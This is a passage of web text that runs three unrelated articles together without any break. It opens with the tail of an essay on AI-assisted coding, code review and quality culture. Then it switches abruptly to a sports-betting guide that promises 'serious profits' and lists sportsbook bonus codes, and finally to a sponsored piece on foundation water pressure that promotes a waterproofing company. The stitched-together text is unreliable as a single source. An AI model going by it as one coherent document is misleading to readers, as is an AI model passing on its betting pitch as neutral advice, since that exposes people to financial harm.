(Think of the people who first created "go fmt" and how many stupid code review comments about whitespace are gone forever. Now that's engineering.)
By the time your review catches a mistake, the mistake has already been made. The root cause happened already. You're too late.
Modularity
I wish I could tell you I had all the answers. Actually I don’t have much. If I did, I’d be first in line for the Singularity because it sounds kind of awesome.
I think we’re going to be stuck with these systems pipeline problems for a long time. Review pipelines — layers of QA — don’t work. Instead, they make you slower while hiding root causes. Hiding causes makes them harder to fix.
But, the call of AI coding is strong. That first, fast step in the pipeline is so fast! It really does feel like having super powers. I want more super powers. What are we going to do about it?
Maybe we finally have a compelling enough excuse to fix the 20 years of problems hidden by code review culture, and replace it with a real culture of quality.
I think the optimists have half of the right idea. Reducing review stages, even to an uncomfortable degree, is going to be needed. But you can’t just reduce review stages without something to replace them. That way lies the Ford Pinto or any recent Boeing aircraft.
The complete package, the table flip, was what Deming brought to manufacturing. You can’t half-adopt a “total quality” system. You need to eliminate the reviews and obsolete them, in one step.
How? You can fully adopt the new system, in small bites. What if some components of your system can be built the new way? Imagine an old-school U.S. auto manufacturer buying parts from Japanese suppliers; wow, these parts are so well made! Now I can start removing QA steps elsewhere because I can just assume the parts are going to work, and my job of "assemble a bigger widget from the parts" has a ton of its complexity removed.
I like this view. I’ve always liked small beautiful things, that’s my own bias. But, you can assemble big beautiful things from small beautiful things.
It’s a lot easier to build those individual beautiful things in small teams that trust each other, that know what quality looks like to them. They deliver their things to customer teams who can clearly explain what quality looks like to them. And on we go. Quality starts bottom-up, and spreads.
I think small startups are going to do really well in this new world, probably better than ever. Startups already have fewer layers of review just because they have fewer people. Some startups will figure out how to produce high quality components quickly; others won't and will fail. Quality by natural selection?
Bigger companies are gonna have a harder time, because their slow review systems are baked in, and deleting them would cause complete chaos.
But, it’s not just about company size. I think engineering teams at any company can get smaller, and have better defined interfaces between them.
Maybe you could have multiple teams inside a company competing to deliver the same component. Each one is just a few people and a few coding bots. Try it 100 ways and see who comes up with the best one. Again, quality by evolution. Code is cheap but good ideas are not. But now you can try out new ideas faster than ever.
Maybe we’ll see a new optimal point on the monoliths-microservices continuum. Microservices got a bad name because they were too micro; in the original terminology, a “micro” service was exactly the right size for a “two pizza team” to build and operate on their own. With AI, maybe it's one pizza and some tokens.
What’s fun is you can also use this new, faster coding to experiment with different module boundaries faster. Features are still hard for lots of reasons, but refactoring and automated integration testing are things the AIs excel at. Try splitting out a module you were afraid to split out before. Maybe it'll add some lines of code. But suddenly lines of code are cheap, compared to the coordination overhead of a bigger team maintaining both parts.
Every team has some monoliths that are a little too big, and too many layers of reviews. Maybe we won't get all the way to Singularity. But, we can engineer a much better world. Our problems are solvable.
It just takes trust.
Watching games, studying stats, and following teams for years builds a specific kind of intelligence. You know when a quarterback struggles against zone coverage. You notice when a pitcher’s velocity drops in late innings. You understand how back-to-back road games affect basketball teams. This accumulated knowledge has real monetary potential when applied correctly to sports betting.
Americans legally wagered $147.91 billion on sports in 2024, a figure that climbed over 23% from 2022. The money flowing through this market creates opportunities for bettors who approach wagering as a skill-based activity rather than entertainment. Turning what you already know into consistent profits requires structure, discipline, and a willingness to treat betting like a second job.

Profitable betting starts with identifying lines where the implied probability differs from your assessed probability of an outcome. A sportsbook might price a team at +150, implying roughly a 40% chance of winning. If your analysis suggests that team wins 50% of the time in similar situations, you have found positive expected value.
This gap between the market’s assessment and yours is where profits live. Building accurate models takes time. Start with sports and bet types you understand deeply. Focus on specific leagues or conferences where your knowledge exceeds that of casual bettors and sometimes even the bookmakers themselves.
Track every wager in a spreadsheet. Record the odds, your assessed probability, the stake, and the result. After a few hundred bets, patterns emerge. You see where your analysis performs well and where it fails. This data becomes the foundation for improvement.
Most sportsbooks provide bonuses to new users, and stacking these across multiple platforms adds real value to your starting funds. Promotion codes like Stake’s welcome offer: COVERSBONUS, DraftKings first-bet insurance, and FanDuel’s bonus bet credits let you place wagers with reduced risk during your first days on each site. Registering with several books also gives you access to line shopping, which matters more than any single promotion over time.
Treating bonus funds as part of a disciplined bankroll prevents reckless betting. Apply the same stake sizing and value calculations to promotional dollars as you would to your own deposit.
The Kelly Criterion is recognized as one of the most mathematically sound approaches to stake sizing. It calculates the optimal percentage of your bankroll to wager based on your perceived edge and the odds offered. The formula prevents overbetting when your edge is small and encourages larger stakes when you hold a substantial advantage.
Full Kelly can produce volatile swings in bankroll size. Many sharp bettors use fractional Kelly, wagering 25% or 50% of the calculated amount. This reduces variance while still maximizing long-term growth. Most value bettors achieve 2-10% return on turnover through disciplined positive expected value approaches, according to industry data.
Set aside a specific amount as your betting bankroll. Never add money impulsively after losses. If you lose your initial stake, step back and reassess your approach before depositing again.
Odds vary between sportsbooks. One platform might offer the Bills at -110 while another posts -105 on the same game. Over thousands of bets, these small differences compound into substantial profit increases.
Maintain funded accounts at several licensed operators. Before placing any wager, check odds at each book. This takes a few extra minutes but directly impacts your bottom line. A half-point difference in spread or a nickel in juice adds up faster than most bettors realize.
Line shopping also reveals market inefficiencies. When books disagree substantially on a line, it often indicates uncertain outcomes where value exists for informed bettors.
Trying to bet every sport spreads your attention thin. Profitable bettors tend to specialize. Pick 1 or 2 sports where your knowledge runs deep. Study them obsessively. Learn how different coaches adjust game plans. Track injury reports from reliable beat writers. Understand how weather affects totals in outdoor sports.
Specialization allows you to spot information the general market misses. A college basketball bettor who watches mid-major conferences closely will notice lineup changes and team dynamics that casual bettors overlook.
The gaming industry commits nearly half a billion dollars annually to responsible gaming initiatives. All 38 U.S. jurisdictions with legal sports betting require operators to maintain self-exclusion programs. These resources exist for a reason.
Set strict loss limits before you start. Never chase losses with larger bets. Treat betting as a long-term endeavor where short-term results carry minimal meaning. If gambling stops being enjoyable or causes financial stress, use the tools available to take a break.
Profitable betting requires emotional control. Bad beats happen. Variance is real. The best bettors process losses without adjusting their strategy impulsively.
Consistent profits come from repeatable processes. Document your handicapping methods. Create rules for which games you bet and which you skip. Stick to your system even during losing streaks.
Review your results monthly. Calculate your return on investment by sport, bet type, and book. Identify leaks and fix them. Profitable bettors constantly refine their approach based on evidence rather than hunches.
Your sports knowledge gives you a starting advantage. Converting that advantage into serious profits requires treating betting with the same rigor you would apply to any business venture. The money is there for bettors willing to do the work.
Photo: creativeart via Freepik.
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Most folks view their houses as immovable objects that provide a permanent shield against the outside world. The foundation seems like a solid block of concrete that will last forever without any real effort or maintenance. However, the ground beneath the floor is actually a dynamic environment.
Soil exerts thousands of pounds of force against residential walls every single day of the year. This pressure is invisible but persistent, slowly pushing against the masonry and looking for any tiny weakness. Over time, even the strongest materials can begin to bow under this immense weight.
Staying ahead of these natural forces requires a proactive approach to home maintenance and site drainage. It helps to have an expert eye evaluate the subtle signs of stress before they turn into major failures. Professional diagnostic services from U.S. Waterproofing help identify these invisible stressors today.
Water is incredibly heavy, weighing about sixty two pounds per cubic foot as it saturates the ground. During heavy rainstorms, the soil surrounding a foundation becomes a giant sponge that holds a massive volume of liquid. This weight creates what engineers call hydrostatic pressure against the exterior.
This pressure is especially problematic in areas with high clay content because clay doesn’t drain well. Instead of moving through the earth, the water sits against the concrete and builds up immense force. This is often why basements develop leaks or damp spots during the wet months.
The force can eventually become so great that it pushes water through the tiny pores of the concrete itself. It can also cause the floor slab to heave or crack as the water tries to find a way inside. Managing this liquid weight is a critical priority.
When a house is first built, a large hole is excavated to make room for the foundation walls. Once the concrete is poured and cured, the space around the exterior is filled back in with loose soil. This creates an area of earth that’s less dense.
This loosely packed area acts like a giant bowl that naturally collects any water running off the roof or the yard. Instead of flowing away from the house, the rain sinks deep into this artificial pocket. This concentrates all the moisture right against the building structure.
Over the years, this cycle of saturation and drying can cause the soil to settle and shift in unpredictable ways. This lack of stability leads to uneven support for the footings that hold up the house. Breaking this cycle requires a plan to redirect water.
Thermal expansion is a powerful force that affects almost every building material used in modern construction. As temperatures rise during the summer, the ground and the foundation materials expand slightly due to the heat. When winter arrives, the opposite happens, causing the structure to contract again.
This constant cycle of growing and shrinking puts a high level of stress on the mortar joints and bricks. Over several years, these tiny movements can weaken the bond between the masonry components. This leads to the hairline fractures that many homeowners notice in their basement walls.
Frost heave adds another layer of complexity as the moisture in the soil freezes and expands with incredible power. This upward and inward force can lift entire sections of a patio or a sidewalk if they aren’t properly drained. Protecting the masonry from these shifts is vital.
Gutters and downspouts are the first line of defense against the thousands of gallons of water that hit the roof. If these systems are clogged with leaves or debris, the water has nowhere to go but over the side. This results in liquid falling on the foundation.
Positioning downspout extensions is just as important as keeping the channels clear of sticks and dirt. A downspout that empties right at the corner of the house is essentially feeding the clay bowl effect. The water should be carried at least ten feet away from the walls.
Oversaturating the ground near the base of the home leads to a softened soil structure that can’t support the weight. This often results in the house tilting or settling deeper into the earth. Simple maintenance of the drainage system prevents many of the most expensive repairs.
Maintaining a healthy foundation requires a combination of external and internal strategies to counteract the environment. No single solution can address every type of pressure that the ground exerts on a residential building. A comprehensive plan looks at the entire site from roofline to the footings.
External mitigation focuses on keeping the soil dry and stable through better grading and efficient drainage systems. Internal strategies involve managing any moisture that does find its way through the walls with drain tiles and pumps. Together, these methods create a dry environment for the whole family.
The goal is to create a predictable and controlled environment regardless of what the weather is doing outside. Addressing these invisible forces early prevents the type of catastrophic damage that ruins property values. Investing in structural health today ensures the home remains a solid sanctuary forever.
Photo: ArtPhoto_studio via Freepik.
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